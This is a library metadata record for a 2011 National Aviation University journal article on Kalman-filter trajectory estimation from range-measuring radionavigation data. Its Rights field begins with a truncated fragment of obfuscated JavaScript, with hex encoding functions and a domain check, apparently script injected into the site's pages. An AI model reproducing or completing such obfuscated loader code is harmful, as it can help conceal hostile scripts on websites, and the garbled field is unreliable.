Record Details

APPLICATION OF OPTIMAL METHODS OF TRAJECTORY PARAMETERS ESTIMATION USING THE RANGE-MEASURING SYSTEMS DATA

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title APPLICATION OF OPTIMAL METHODS OF TRAJECTORY PARAMETERS ESTIMATION USING THE RANGE-MEASURING SYSTEMS DATA
ВИКОРИСТАННЯ ОПТИМАЛЬНИХ МЕТОДІВ ОЦІНКИ ТРАЄКТОРНИХ ПАРАМЕТРІВ ЗА ДАНИМИ РАДІОДАЛЕКОМІРНИХ СИСТЕМ
ВИКОРИСТАННЯ ОПТИМАЛЬНИХ МЕТОДІВ ОЦІНКИ ТРАЄКТОРНИХ ПАРАМЕТРІВ ЗА ДАНИМИ РАДІОДАЛЕКОМІРНИХ СИСТЕМ
 
Creator Васильєв, В.; Національний авіаційний університет
Науменко, К.; Національний авіаційний університет
 
Subject


ground-based radionavigation range-measuring system; Kalman filter; optimal one-stage trajectory parameter estimation
наземна радіодалекомірна система спостереження; оптимальна одноетапна оцінка траєкторних параметрів; фільтр Калмана
 
Description In this paper the algorithm of one-stage optimal trajectory parameter estimation using the data ofmultiposition radionavigation range-measuring system is synthesized. The problem of nonlinearityis solved and the conditions of using linear Kalman filter are shown. The accuracy of thesynthesized algorithm is assessed; the results of computer simulation are demonstrated
Синтезовано алгоритм оптимальної оцінки траєкторних параметрів за данимивимірювань двопозиційної системи далекомірних радіонавігаційних станцій. Розглянутопроблему нелінійності, що виникає при вирішенні поставленої задачі в прямокутній системікоординат. Виконано оцінку точності синтезованого алгоритму.Ключові слова: наземна радіодалекомірна система спостереження, оптимальнаодноетапна оцінка траєкторних параметрів, фільтр Калмана.
Синтезовано алгоритм оптимальної оцінки траєкторних параметрів за данимивимірювань двопозиційної системи далекомірних радіонавігаційних станцій. Розглянутопроблему нелінійності, що виникає при вирішенні поставленої задачі в прямокутній системікоординат. Виконано оцінку точності синтезованого алгоритму
 
Publisher National Aviation University
 
Contributor


 
Date 2011-04-01
 
Type



 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/75
10.18372/2306-1472.49.75
 
Source Proceedings of the National Aviation University; Том 49, № 4 (2011); 20-24
Вестник Национального авиационного университета; Том 49, № 4 (2011); 20-24
Вісник Національного Авіаційного Університету; Том 49, № 4 (2011); 20-24
 
Language uk
 
Coverage


 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ